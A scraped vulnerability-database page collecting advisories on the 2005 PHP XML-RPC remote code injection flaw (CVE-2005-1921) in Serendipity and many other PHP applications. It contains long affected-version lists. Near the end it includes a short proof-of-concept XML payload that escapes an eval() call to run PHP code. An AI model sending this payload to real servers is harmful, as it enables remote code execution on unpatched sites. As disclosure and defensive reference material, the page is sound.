Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

    

- 漏洞信息 (F38373)

advisory-022005.txt (PacketStormID:F38373)
2005-07-01 00:00:00
Christopher Kunz  
advisory,remote
CVE-2005-1921
[点击下载]

Serendipity version 0.8.2 and below suffer from a remote command execution flaw.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                         Hardened PHP Project
                         www.hardened-php.net


                       -= Security  Advisory =-


      Advisory: Remote code execution in Serendipity
  Release Date: 2005/06/29
Last Modified: 2005/06/29
        Author: Christopher Kunz <christopher.kunz@hardened-php.net>
   Application: Serendipity <= 0.8.2
      Severity: Arbitrary remote code execution
          Risk: Very High
Vendor Status: Vendor has released an updated version
    References: http://www.hardened-php.net/advisory-022005.php


Overview:

    Quote from http://www.s9y.org/:
    "Serendipity is a weblog/blog system, implemented with PHP. It is standards
    compliant, feature rich and open source (BSD License). Serendipity is
    constantly under active development, with a team of talented developers
    trying to make the best PHP powered blog on the net."


Details:

    GulfTech Security [1] recently discovered a vulnerability in the PHP XML RPC
    project [2] that leads to remote code execution. Unfortunately, this vulner-
    ability also exists in the PEAR XMLRPC implementation, and GulfTech somewhat
    neglected to notify the vendors in question.
    Similar to the recently-discovered holes in PostNuke and Drupal, the
    XML-RPC parser in Serendipity allows for remote code execution. An attacker
    can send a forged POST request to the victim's blog and include PHP code in
    the request body. This code is executed in the context of the affected
    Serendipity instance.
    Since the vulnerability is extremely easy to exploit and apart from one POST
    request, no suspicious activity is logged, it could be used for automated
    mass defacements and viral reproduction, similar to Santy.
    The Hardened PHP project had knowledge of that kind of vulnerability for
    some time now but tried to establish a responsible way of coordinating the
    disclosure with all affected parties.
    The maintainer of PEAR::XML_RPC has released an updated version that fixes
    the vulnerability. The Serendipity team has released a fixed version, too.


CVE Information:

    The Common Vulnerabilities and Exposures project (cve.mitre.org) has
    assigned the name CAN-2005-1921 to the vulnerability in PEAR::XML_RPC.


Proof of Concept:

    The Hardened PHP Project is not going to release an exploit for
    this vulnerability to the public.
    It is trivial to implement, anyway.


Disclosure Timeline:

    29. June 2005 - Vulnerability discovered and vendor notified
    29. June 2005 - Vendor released bugfixed version
    29. June 2005 - Public disclosure


Recommendation:

    We urge you to update to the newest version of Serendipity, 0.8.2.
    http://prdownloads.sourceforge.net/php-blog/serendipity-0.8.2.tar.gz
    If, for some reason, that seems unfeasible, you should render the
    file serendipity_xmlrpc.php unreadable by the web server to close the
    most obvious attack vector.


References:

    [ 1 ] http://www.gulftech.org/
    [ 2 ] http://phpxmlrpc.sourceforge.net/


GPG-Key:

    http://www.hardened-php.net/hardened-php-signature-key.asc

    pub  1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
    Key fingerprint = 066F A6D0 E57E 9936 9082  7E52 4439 14CC 0A86 4AA1


Copyright 2005 Christopher Kunz from the hardened PHP Project. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFCwtB+RDkUzAqGSqERAmh4AKDFA745A5oQWlowMAdYn9DZ5KMxZwCfayFC
KiCl/YVS7QPt0hw6pLsz8QA=
=pfYU
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

17793
XML-RPC for PHP (PHPXMLRPC) parseRequest() Function Arbitrary PHP Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

XML-RPC for PHP (PHPXMLRPC) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to the 'parseRequest()' function not properly sanitizing user-supplied input. By creating an XML file that uses single quotes to escape into the 'eval()' call, a remote attacker can execute arbitrary PHP code resulting in a loss of integrity.

- 时间线

2005-06-29 Unknow
2005-06-30 Unknow

- 解决方案

Upgrade to versions listed below or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. XML-RPC for PHP - 1.1.1 PostNuke - .760 Drupal - 4.5.4 / 4.6.2 XML_RPC - 1.3.1 phpMyFAQ - 1.4.9 / 1.5.0 RC5 Serendipity - 0.8.2 Nucleus CMS - 3.21 phpAdsNew - 2.0.6 phpPgAds - 2.0.6 phpGroupWare - 0.9.16.006 CamRPC - 1.0.2 eGroupWare - 1.0.0.007-3 / 1.0.0.008-2 MailWatch for MailScanner - 1.0.1 Ampache - 3.3.1.2 CivicSpace - 0.8.1 Jaws - 0.5.2 Max Media Manager - 0.1.28-rc BLOG:CMS - 3.6.5 Eventum - 1.5.5 XOOPS - 2.2.1

- 相关参考

- 漏洞作者

- 漏洞信息

XML-RPC for PHP Remote Code Injection Vulnerability
Input Validation Error 14088
Yes No
2005-06-29 12:00:00 2007-03-12 10:34:00
Discovery is credited to James from GulfTech Security Research.

- 受影响的程序版本

Xoops Xoops 2.0.12
Xoops Xoops 2.0.11
Xoops Xoops 2.0.10
Xoops Xoops 2.0.9 .3
Xoops Xoops 2.0.9 .2
Xoops Xoops 2.0.5 .2
Xoops Xoops 2.0.5 .1
Xoops Xoops 2.0.5
Xoops Xoops 2.0.3
Xoops Xoops 2.0.2
Xoops Xoops 2.0.1
Xoops Xoops 2.0
XML-RPC for PHP XML-RPC for PHP 1.1
XML-RPC for PHP XML-RPC for PHP 1.0.99 .2
XML-RPC for PHP XML-RPC for PHP 1.0.99
XML-RPC for PHP XML-RPC for PHP 1.0 2
XML-RPC for PHP XML-RPC for PHP 1.0 1
XML-RPC for PHP XML-RPC for PHP 1.0
WordPress WordPress 1.5.1 .2
WordPress WordPress 1.5.1
WordPress WordPress 1.5
WordPress WordPress 1.2.2
WordPress WordPress 1.2.1
WordPress WordPress 1.2
+ Gentoo Linux 1.4
+ Gentoo Linux
WordPress WordPress 0.71
WordPress WordPress 0.7
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Enterprise Linux 2.0
TikiWiki Project TikiWiki 1.8.4
TikiWiki Project TikiWiki 1.8.3
TikiWiki Project TikiWiki 1.8.2
TikiWiki Project TikiWiki 1.8.1
TikiWiki Project TikiWiki 1.8
TikiWiki Project TikiWiki 1.7.9
TikiWiki Project TikiWiki 1.7.8
TikiWiki Project TikiWiki 1.7.7
TikiWiki Project TikiWiki 1.7.6
TikiWiki Project TikiWiki 1.7.5
TikiWiki Project TikiWiki 1.7.4
TikiWiki Project TikiWiki 1.7.3
TikiWiki Project TikiWiki 1.7.2
TikiWiki Project TikiWiki 1.7.1 .1
TikiWiki Project TikiWiki 1.6.1
SuSE SUSE Linux Enterprise Server 8
SGI ProPack 3.0 SP6
Seagull PHP Framework Seagull PHP Framework 0.4.3
Seagull PHP Framework Seagull PHP Framework 0.4.2
Seagull PHP Framework Seagull PHP Framework 0.4.1
Seagull PHP Framework Seagull PHP Framework 0.4 dev3
Seagull PHP Framework Seagull PHP Framework 0.4 dev2
Seagull PHP Framework Seagull PHP Framework 0.4 dev1
Seagull PHP Framework Seagull PHP Framework 0.4
S9Y Serendipity 0.8.1
S9Y Serendipity 0.8 -beta6 Snapshot
S9Y Serendipity 0.8 -beta6
S9Y Serendipity 0.8 -beta5
S9Y Serendipity 0.8
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Desktop 4.0
RedHat Desktop 3.0
Red Hat Fedora Core4
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
PostNuke Development Team PostNuke 0.76 RC4b
PostNuke Development Team PostNuke 0.76 RC4a
PostNuke Development Team PostNuke 0.76 RC4
PostNuke Development Team PostNuke 0.75
phpWebsite phpWebsite 0.10.1
phpWebsite phpWebsite 0.10
phpWebsite phpWebsite 0.9.3 -4
phpWebsite phpWebsite 0.9.3 -3
phpWebsite phpWebsite 0.9.3 -2
phpWebsite phpWebsite 0.9.3 -1
phpWebsite phpWebsite 0.9.3
phpPgAds phpPgAds 2.0.6
phpPgAds phpPgAds 2.0
phpMyFAQ phpMyFAQ 1.5 RC4
phpMyFAQ phpMyFAQ 1.5 RC3
phpMyFAQ phpMyFAQ 1.5 RC2
phpMyFAQ phpMyFAQ 1.5 RC1
phpMyFAQ phpMyFAQ 1.5 beta3
phpMyFAQ phpMyFAQ 1.5 beta2
phpMyFAQ phpMyFAQ 1.5 beta1
phpMyFAQ phpMyFAQ 1.5 alpha2
phpMyFAQ phpMyFAQ 1.5 alpha1
phpMyFAQ phpMyFAQ 1.4.8
phpMyFAQ phpMyFAQ 1.4.7
phpMyFAQ phpMyFAQ 1.4.6
phpMyFAQ phpMyFAQ 1.4.5
phpMyFAQ phpMyFAQ 1.4.4
phpMyFAQ phpMyFAQ 1.4.3
phpMyFAQ phpMyFAQ 1.4.2
phpMyFAQ phpMyFAQ 1.4.1
phpMyFAQ phpMyFAQ 1.4 a
phpMyFAQ phpMyFAQ 1.4 -alpha 2
phpMyFAQ phpMyFAQ 1.4 -alpha 1
phpMyFAQ phpMyFAQ 1.4
PHPGroupWare PHPGroupWare 0.9.16 RC3
PHPGroupWare PHPGroupWare 0.9.16 RC2
PHPGroupWare PHPGroupWare 0.9.16 RC1
PHPGroupWare PHPGroupWare 0.9.16 .006
PHPGroupWare PHPGroupWare 0.9.16 .005
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
PHPGroupWare PHPGroupWare 0.9.16 .003
PHPGroupWare PHPGroupWare 0.9.16 .002
PHPGroupWare PHPGroupWare 0.9.16 .000
PHPGroupWare PHPGroupWare 0.9.14 .007
PHPGroupWare PHPGroupWare 0.9.14 .006
PHPGroupWare PHPGroupWare 0.9.14 .005
PHPGroupWare PHPGroupWare 0.9.14 .004
PHPGroupWare PHPGroupWare 0.9.14 .003
PHPGroupWare PHPGroupWare 0.9.14 .002
PHPGroupWare PHPGroupWare 0.9.14 .001
PHPGroupWare PHPGroupWare 0.9.14
PHPGroupWare PHPGroupWare 0.9.13
- Debian Linux 2.2
PHPGroupWare PHPGroupWare 0.9.12
- Conectiva Linux 9.0
- Conectiva Linux 8.0
- Conectiva Linux 7.0
- MySQL AB MySQL 3.23.36
- MySQL AB MySQL 3.23.34
- MySQL AB MySQL 3.23.31
- PostgreSQL PostgreSQL 6.5.3
- PostgreSQL PostgreSQL 6.3.2
phpAdsNew phpAdsNew 2.0.4 -pr2
phpAdsNew phpAdsNew 2.0.4 -pr1
phpAdsNew phpAdsNew 2.0 beta 6
phpAdsNew phpAdsNew 2.0 beta 5
phpAdsNew phpAdsNew 2 dev 30092001
phpAdsNew phpAdsNew 2 dev 09102001
PHP-Wiki PHP-Wiki 1.3.11 _rc3
PHP-Wiki PHP-Wiki 1.3.11 _rc2
PHP-Wiki PHP-Wiki 1.3.10
PHP-Wiki PHP-Wiki 1.3.9
PHP-Wiki PHP-Wiki 1.3.3
PHP-Wiki PHP-Wiki 1.3.2
PHP-Wiki PHP-Wiki 1.3.1
PHP-Wiki PHP-Wiki 1.2.2
PHP-Wiki PHP-Wiki 1.2.1
PHP-Wiki PHP-Wiki 1.2
PHP PHP 4.3.11
PHP PHP 4.3.10
PHP PHP 4.3.9
PHP PHP 4.3.8
PHP PHP 4.3.7
PHP PHP 4.3.6
PHP PHP 4.3.5
PHP PHP 4.3.4
PHP PHP 4.3.3
PHP PHP 4.3.2
PHP PHP 4.3.1
PHP PHP 4.3
PHP PHP 4.2.3
PHP PHP 4.2.2
PHP PHP 4.2.1
PHP PHP 4.2 .0
PHP PHP 4.2 -dev
PHP PHP 4.1.2
PHP PHP 4.1.1
PHP PHP 4.1 .0
PHP PHP 4.0.7 RC3
PHP PHP 4.0.7 RC2
PHP PHP 4.0.7 RC1
PHP PHP 4.0.7
PHP PHP 4.0.6
PHP PHP 4.0.5
PHP PHP 4.0.4
PHP PHP 4.0.3 pl1
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
PHP PHP 4.0.3
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt Qube3 Japanese 4000WGJ
+ Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
+ Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ XTR Japanese 3500R-ja
PHP PHP 4.0.2
PHP PHP 4.0.1 pl2
PHP PHP 4.0.1 pl1
PHP PHP 4.0.1
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt Qube3 w/ Caching and RAID 4100WG
+ Sun Cobalt Qube3 w/Caching 4010WG
+ Sun Cobalt RaQ4 3001R
+ Sun Cobalt RaQ4 Japanese RAID 3100R-ja
+ Sun Cobalt RaQ4 RAID 3100R
PHP PHP 4.0 0
PEAR XML_RPC 1.3 RC3
PEAR XML_RPC 1.3 RC2
PEAR XML_RPC 1.3 RC1
PEAR XML_RPC 1.3
Nucleus CMS Nucleus CMS 3.2
Nucleus CMS Nucleus CMS 3.1
Nucleus CMS Nucleus CMS 3.0 RC
Nucleus CMS Nucleus CMS 3.0 1
Nucleus CMS Nucleus CMS 3.0
MySQL AB Eventum 1.5.4
MAXdev MD-Pro 1.0.72
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
Mandriva Linux Mandrake 10.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MailWatch for MailScanner MailWatch for MailScanner 1.0
MailWatch for MailScanner MailWatch for MailScanner 0.5.1
MailWatch for MailScanner MailWatch for MailScanner 0.5
MailWatch for MailScanner MailWatch for MailScanner 0.4
HP Tru64 5.1 B-3
HP Tru64 5.1 B-2 PK4
HP Tru64 5.1 A PK6
FreeMed Software FreeMed 0.8.1
FreeMed Software FreeMed 0.8 .0
eGroupWare eGroupWare 1.0.6
eGroupWare eGroupWare 1.0.3
eGroupWare eGroupWare 1.0.1
eGroupWare eGroupWare 1.0 .0.007
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Gentoo Linux
Drupal Drupal 4.6.1
Drupal Drupal 4.6
Drupal Drupal 4.5.3
Drupal Drupal 4.5.2
Drupal Drupal 4.5.2
Drupal Drupal 4.5.1
Drupal Drupal 4.5
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Conectiva Linux 10.0
Conectiva Linux 9.0
CivicSpace Labs CivicSpace 0.8.1
CivicSpace Labs CivicSpace 0.8 .0.5
CivicSpace Labs CivicSpace 0.8 .0.4
CivicSpace Labs CivicSpace 0.8 .0.3
CivicSpace Labs CivicSpace 0.8 .0.2
CivicSpace Labs CivicSpace 0.7.2
BLOG:CMS BLOG:CMS 3.6.4
BLOG:CMS BLOG:CMS 3.6.2
b2evolution b2evolution 0.9 .0.12
b2evolution b2evolution 0.9 .0.11
b2evolution b2evolution 0.9 .0.10
b2evolution b2evolution 0.9 .0.09
b2evolution b2evolution 0.9 .0.08
b2evolution b2evolution 0.9 .0.05
b2evolution b2evolution 0.9 .0.03
b2evolution b2evolution 0.8.9
b2evolution b2evolution 0.8.7
b2evolution b2evolution 0.8.6 .2
b2evolution b2evolution 0.8.6 .1
b2evolution b2evolution 0.8.6
b2evolution b2evolution 0.8.2 .2
b2evolution b2evolution 0.8.2
Ampache Ampache 3.3.1
Ampache Ampache 3.3
Ampache Ampache 3.2.4
Ampache Ampache 3.2.3
Ampache Ampache 3.2.2
Ampache Ampache 3.2.1
Ampache Ampache 3.2
Xoops Xoops 2.0.12 a
XML-RPC for PHP XML-RPC for PHP 1.1.1
WordPress WordPress 1.5.1 .3
TikiWiki Project TikiWiki 1.8.5
Seagull PHP Framework Seagull PHP Framework 0.4.4
S9Y Serendipity 0.8.2
phpPgAds phpPgAds 2.0.5
phpMyFAQ phpMyFAQ 1.5 RC5
phpMyFAQ phpMyFAQ 1.4.9
phpAdsNew phpAdsNew 2.0.6
PHP PHP 4.4 .0
PEAR XML_RPC 1.3.1
Nucleus CMS Nucleus CMS 3.21
MySQL AB Eventum 1.5.5
MAXdev MD-Pro 1.0.73
MailWatch for MailScanner MailWatch for MailScanner 1.0.1
FreeMed Software FreeMed 0.8.1 .1
Drupal Drupal 4.6.2
Drupal Drupal 4.5.4
b2evolution b2evolution 0.9.1
Ampache Ampache 3.3.1 .2

- 不受影响的程序版本

Xoops Xoops 2.0.12 a
XML-RPC for PHP XML-RPC for PHP 1.1.1
WordPress WordPress 1.5.1 .3
TikiWiki Project TikiWiki 1.8.5
Seagull PHP Framework Seagull PHP Framework 0.4.4
S9Y Serendipity 0.8.2
phpPgAds phpPgAds 2.0.5
phpMyFAQ phpMyFAQ 1.5 RC5
phpMyFAQ phpMyFAQ 1.4.9
phpAdsNew phpAdsNew 2.0.6
PHP PHP 4.4 .0
PEAR XML_RPC 1.3.1
Nucleus CMS Nucleus CMS 3.21
MySQL AB Eventum 1.5.5
MAXdev MD-Pro 1.0.73
MailWatch for MailScanner MailWatch for MailScanner 1.0.1
FreeMed Software FreeMed 0.8.1 .1
Drupal Drupal 4.6.2
Drupal Drupal 4.5.4
b2evolution b2evolution 0.9.1
Ampache Ampache 3.3.1 .2

- 漏洞讨论

XML-RPC for PHP is affected by a remote code-injection vulnerability.

An attacker may exploit this issue to execute arbitrary commands or code in the context of the webserver. This may facilitate various attacks, including unauthorized remote access.

XML-RPC for PHP 1.1 and prior versions are affected by this issue. Other applications using this library are also affected.

- 漏洞利用

An exploit is not required.

The following proof-of-concept XML file is available:

<?xml version="1.0"?>
<methodCall>
<methodName>test.method</methodName>
<params>
<param>
<value><name>','')); phpinfo(); exit;/*</name></value>
</param>
</params>
</methodCall>

The proof-of-concept xml_rpc_poc.pl has been provided by dukenn.

The proof-of-concept xoops.pl for xoops has been provided by 1dt.w0lf.

comsatcat has provided a metasploit exploit for PHP XMLRPC, xmlrpc_exp.pl.

H D Moore <hdm@metasploit.com> has provided a metasploit exploit for PHP XMLRPC, php_xmlrpc_eval.pm.

- 解决方案

Please see the referenced advisories for more information.


phpWebsite phpWebsite 0.10

Seagull PHP Framework Seagull PHP Framework 0.4 dev2

Seagull PHP Framework Seagull PHP Framework 0.4 dev3

Seagull PHP Framework Seagull PHP Framework 0.4.1

MailWatch for MailScanner MailWatch for MailScanner 0.5.1

FreeMed Software FreeMed 0.8 .0

S9Y Serendipity 0.8

S9Y Serendipity 0.8.1

b2evolution b2evolution 0.8.9

b2evolution b2evolution 0.9 .0.12

b2evolution b2evolution 0.9 .0.11

PHPGroupWare PHPGroupWare 0.9.16 .005

phpWebsite phpWebsite 0.9.3 -2

MailWatch for MailScanner MailWatch for MailScanner 1.0

XML-RPC for PHP XML-RPC for PHP 1.0 1

eGroupWare eGroupWare 1.0 .0.007

XML-RPC for PHP XML-RPC for PHP 1.1

WordPress WordPress 1.2

WordPress WordPress 1.2.2

PEAR XML_RPC 1.3

PEAR XML_RPC 1.3 RC2

PEAR XML_RPC 1.3 RC3

phpMyFAQ phpMyFAQ 1.4.3

phpMyFAQ phpMyFAQ 1.4.4

phpMyFAQ phpMyFAQ 1.4.8

phpMyFAQ phpMyFAQ 1.5 RC1

phpMyFAQ phpMyFAQ 1.5 beta2

WordPress WordPress 1.5

Xoops Xoops 2.0.1

Xoops Xoops 2.0.10

Xoops Xoops 2.0.2

Xoops Xoops 2.0.3

phpAdsNew phpAdsNew 2.0.4 -pr2

Nucleus CMS Nucleus CMS 3.0 1

Nucleus CMS Nucleus CMS 3.1

Ampache Ampache 3.2

PHP PHP 4.0.1

PHP PHP 4.0.1 pl2

PHP PHP 4.0.3 pl1

PHP PHP 4.0.3

PHP PHP 4.0.7 RC2

PHP PHP 4.2 -dev

PHP PHP 4.3.2

PHP PHP 4.3.5

Drupal Drupal 4.5.2

Drupal Drupal 4.6

Drupal Drupal 4.6.1

HP Tru64 5.1 B-3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站